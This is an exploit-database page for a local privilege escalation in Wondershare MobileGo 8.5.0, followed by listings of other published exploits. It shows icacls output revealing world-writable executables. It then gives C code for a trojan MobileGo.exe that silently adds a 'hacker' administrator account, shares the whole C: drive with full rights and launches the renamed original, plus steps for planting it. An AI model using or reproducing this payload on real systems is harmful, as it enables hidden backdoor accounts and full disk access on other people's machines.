Search for hundreds of thousands of exploits

"MobileGo 8.5.0 - Insecure File Permissions"

Author

Exploit author

ZwX

Platform

Exploit platform

windows

Release date

Exploit published date

2019-11-18

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
# Exploit Title: MobileGo 8.5.0 - Insecure File Permissions
# Exploit Author: ZwX
# Exploit Date: 2019-11-15
# Vendor Homepage : https://www.wondershare.net/
# Software Link: https://www.wondershare.net/mobilego/
# Tested on OS: Windows 7 


# Proof of Concept (PoC):
==========================
C:\Program Files\Wondershare\MobileGo>icacls *.exe
adb.exe Everyone:(I)(F)
        AUTORITE NT\Système:(I)(F)
        BUILTIN\Administrateurs:(I)(F)
        BUILTIN\Utilisateurs:(I)(RX)

APKInstaller.exe Everyone:(I)(F)
        AUTORITE NT\Système:(I)(F)
        BUILTIN\Administrateurs:(I)(F)
        BUILTIN\Utilisateurs:(I)(RX)

BsSndRpt.exe Everyone:(I)(F)
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Administrateurs:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)

DriverInstall.exe Everyone:(I)(F)
                  AUTORITE NT\Système:(I)(F)
                  BUILTIN\Administrateurs:(I)(F)
                  BUILTIN\Utilisateurs:(I)(RX)

fastboot.exe Everyone:(I)(F)
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Administrateurs:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)

FetchDriver.exe Everyone:(I)(F)
                AUTORITE NT\Système:(I)(F)
                BUILTIN\Administrateurs:(I)(F)
                BUILTIN\Utilisateurs:(I)(RX)

MGNotification.exe Everyone:(I)(F)
                   AUTORITE NT\Système:(I)(F)
                   BUILTIN\Administrateurs:(I)(F)
                   BUILTIN\Utilisateurs:(I)(RX)

MobileGo.exe Everyone:(I)(F)
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Administrateurs:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)

MobileGoService.exe Everyone:(I)(F)
                    AUTORITE NT\Système:(I)(F)
                    BUILTIN\Administrateurs:(I)(F)
                    BUILTIN\Utilisateurs:(I)(RX)

unins000.exe Everyone:(I)(F)
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Administrateurs:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)

URLReqService.exe Everyone:(I)(F)
                  AUTORITE NT\Système:(I)(F)
                  BUILTIN\Administrateurs:(I)(F)
                  BUILTIN\Utilisateurs:(I)(RX)

WAFSetup.exe Everyone:(I)(F)
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Administrateurs:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)

WsConverter.exe Everyone:(I)(F)
                AUTORITE NT\Système:(I)(F)
                BUILTIN\Administrateurs:(I)(F)
                BUILTIN\Utilisateurs:(I)(RX)

WsMediaInfo.exe Everyone:(I)(F)
                AUTORITE NT\Système:(I)(F)
                BUILTIN\Administrateurs:(I)(F)
                BUILTIN\Utilisateurs:(I)(RX)
				
				
				
#Exploit code(s): 
=================

1) Compile below 'C' code name it as "MobileGo.exe"

#include<windows.h>

int main(void){
 system("net user hacker abc123 /add");
 system("net localgroup Administrators hacker  /add");
 system("net share SHARE_NAME=c:\ /grant:hacker,full");
 WinExec("C:\\Program Files\\Wondershare\\MobileGo\\~MobileGo.exe",0);
return 0;
} 

2) Rename original "MobileGo.exe" to "~MobileGo.exe"
3) Place our malicious "MobileGo.exe" in the MobileGo directory
4) Disconnect and wait for a more privileged user to connect and use MobileGo IDE. 
Privilege Successful Escalation
Release Date Title Type Platform Author
2020-10-23 "Lot Reservation Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-23 "Gym Management System 1.0 - 'id' SQL Injection" webapps php "Jyotsna Adhana"
2020-10-23 "Car Rental Management System 1.0 - Arbitrary File Upload" webapps php "Jyotsna Adhana"
2020-10-23 "Point of Sales 1.0 - 'id' SQL Injection" webapps php "Ankita Pal"
2020-10-23 "Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)" webapps php "Ankita Pal"
2020-10-23 "Ajenti 2.1.36 - Remote Code Execution (Authenticated)" webapps python "Ahmet Ümit BAYRAM"
2020-10-23 "Online Library Management System 1.0 - Arbitrary File Upload" webapps php "Jyotsna Adhana"
2020-10-23 "Stock Management System 1.0 - 'brandId and categoriesId' SQL Injection" webapps php "Ihsan Sencan"
2020-10-23 "User Registration & Login and User Management System 2.1 - SQL Injection" webapps php "Ihsan Sencan"
2020-10-23 "Point of Sales 1.0 - 'username' SQL Injection" webapps php "Jyotsna Adhana"
Release Date Title Type Platform Author
2020-10-14 "Guild Wars 2 - Insecure Folder Permissions" local windows "George Tsimpidas"
2020-10-13 "Battle.Net 1.27.1.12428 - Insecure File Permissions" local windows "George Tsimpidas"
2020-10-07 "BACnet Test Server 1.01 - Remote Denial of Service (PoC)" dos windows LiquidWorm
2020-09-29 "BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC)" local windows "Christian Vierschilling"
2020-09-29 "CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)" local windows boku
2020-09-28 "MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation" local windows "Matteo Malvica"
2020-09-21 "ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path" local windows "Burhanettin Ozgenc"
2020-09-17 "Microsoft SQL Server Reporting Services 2016 - Remote Code Execution" remote windows "West Shepherd"
2020-09-16 "Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software" local windows hyp3rlinx
2020-09-14 "Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path" local windows Jok3r
Release Date Title Type Platform Author
2020-02-12 "MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow" local windows ZwX
2020-02-12 "MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow" local windows ZwX
2020-02-12 "MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow" local windows ZwX
2020-02-11 "Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow" local windows ZwX
2020-02-11 "DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow" local windows ZwX
2020-02-11 "DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow" local windows ZwX
2020-02-10 "Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow" local windows ZwX
2020-02-06 "ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path" local windows ZwX
2020-01-13 "Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions" local windows ZwX
2020-01-09 "MSN Password Recovery 1.30 - XML External Entity Injection" local xml ZwX
2020-01-09 "ZIP Password Recovery 2.30 - 'ZIP File' Denial of Service (PoC)" dos windows ZwX
2020-01-06 "Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path" local windows ZwX
2019-12-18 "XnView 2.49.1 - 'Research' Denial of Service (PoC)" dos windows ZwX
2019-12-18 "AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow" local windows ZwX
2019-12-05 "Amiti Antivirus 25.0.640 - Unquoted Service Path" local windows ZwX
2019-12-05 "NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path" local windows ZwX
2019-12-04 "Microsoft Visual Basic 2010 Express - XML External Entity Injection" local xml ZwX
2019-11-29 "SpotAuditor 5.3.2 - 'Key' Denial of Service" dos windows ZwX
2019-11-29 "SpotAuditor 5.3.2 - 'Name' Denial of Service" dos windows ZwX
2019-11-27 "Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)" dos windows ZwX
2019-11-27 "SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)" dos windows ZwX
2019-11-22 "LiteManager 4.5.0 - Insecure File Permissions" local windows ZwX
2019-11-22 "ProShow Producer 9.0.3797 - ('ScsiAccess') Unquoted Service Path" local windows ZwX
2019-11-19 "XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service" dos windows ZwX
2019-11-19 "BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path" local windows ZwX
2019-11-18 "MobileGo 8.5.0 - Insecure File Permissions" local windows ZwX
2018-09-13 "Clone2Go Video to iPod Converter 2.5.0 - Denial of Service (PoC)" dos windows_x86 ZwX
2018-09-13 "Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow" local windows ZwX
2018-08-29 "R 3.4.4 - Buffer Overflow (SEH)" local windows ZwX
2016-12-16 "WHMCompleteSolution (WHMCS) Addon VMPanel 2.7.4 - SQL Injection" webapps php ZwX
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/47667/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.